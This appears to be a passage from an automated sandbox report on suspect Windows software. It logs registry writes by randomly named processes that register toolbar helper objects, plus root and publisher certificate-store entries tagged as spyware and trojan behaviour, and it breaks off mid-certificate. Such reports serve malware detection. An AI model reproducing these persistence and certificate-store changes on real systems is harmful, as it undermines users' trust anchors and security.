Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}"	SxjcCox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}"	SxjcCox.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\TypeLib\Version = "1.0"	QDsgliQ.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3e1d4993141cd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ProgID = "Toolbar.ExtensionHelperObject.1"	DNnZcAy.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\ = "BackgroundScriptEngine Class"	QDsgliQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ = "{FCD323B9-9E05-4433-8305-22E34A2FA3B9}"	QDsgliQ.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	SxjcCox.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Rugomaevoki.exevpn.tmptapinstall.exeSidyshywyly.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Rugomaevoki.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	Sidyshywyly.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee